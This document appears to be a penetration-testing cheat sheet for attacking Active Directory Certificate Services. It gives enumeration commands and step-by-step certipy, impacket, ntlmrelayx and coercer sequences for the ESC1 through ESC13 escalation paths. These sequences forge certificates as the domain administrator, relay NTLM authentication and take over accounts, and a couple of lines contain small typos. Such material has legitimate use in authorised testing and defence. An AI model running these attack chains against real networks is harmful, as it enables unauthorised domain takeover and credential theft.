Enumeration

NetExec

Find PKI Enrollment Services in Active Directory and Certificate Templates Names

1
nxc ldap ip -u username -p password -M adcs

Certipy

Search for vulnerable certificate templates

1
certipy find -u username -p password -dc-ip ip -target dc -enabled -vulnerable -stdout

Certify

Search for vulnerable certificate templates

1
Certify.exe find /vulnerable

Attacks

ESC1

1
addcomputer.py domain/username:password -computer-name computer_name -computer-pass computer_password
1
certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator -dc-ip ip

Or

1
certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip

Sometimes if you run certipy and see Minimum RSA Key Length : 4096, you need to provide -key-size 4096 to certipy

1
certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip -key-size 4096
1
certipy auth -pfx administrator.pfx -domain domain -u username -dc-ip ip

ESC3

1
certipy req -u username -p password -ca ca -target domain -template template
1
certipy req username -p password -ca ca -target domain -template User -on-behalf-of 'domain\administrator' -pfx pfx_file
1
certipy auth -pfx administrator.pfx -dc-ip ip

ESC4

1
certipy template -u username -p password -template template -save-old -dc-ip ip
1
certipy req -u username -p password -dc-ip ip -ca ca -target dc -template template -upn administrator
1
certipy auth -pfx administrator.pfx -domain domain -u administrator -dc-ip ip

ESC6

1
certipy req -u administrator@domain -p password -ca ca -target domain -template template -upn administrator

ESC7

1
certipy ca -ca ca -add-officer username -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
1
certipy ca -ca ca -enable-template SubCA -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
1
certipy req -u username@domain -p password -ca ca -target ip -template SubCA -upn username@domain
1
certipy ca -ca ca -issue-request request_ID -u username@domain -p password
1
certipy req -u username@domain -p password -ca ca -target ip -retrieve request_ID
1
certipy auth -pfx pfx_file -domain domain -u username -dc-ip ip

ESC8

1
ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
1
coercer coerce -u username -p password -l ws_ip -t dc_ip --always-continue
1
certipy- auth -pfx administrator.pfx

ESC9

1
certipy shadow auto -u username@domain -hashes :hash -account target_username
1
certipy account update -u username@domain -hashes :hash -user target_username -upn administrator
1
certipy req -u target_username@domain -hashes :target_hash -ca ca -template template -target $DC_IP
1
certipy account update -u username@domain -hashes :hash -user target_username -upn target_username
1
certipy auth -pfx administrator.pfx -domain domain

ESC13

1
certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip -key-size 4096
1
python3 gettgtpkinit.py -cert-pfx pfx_file domain/username ccache_file -dc-ip ip -v

Resources

Tools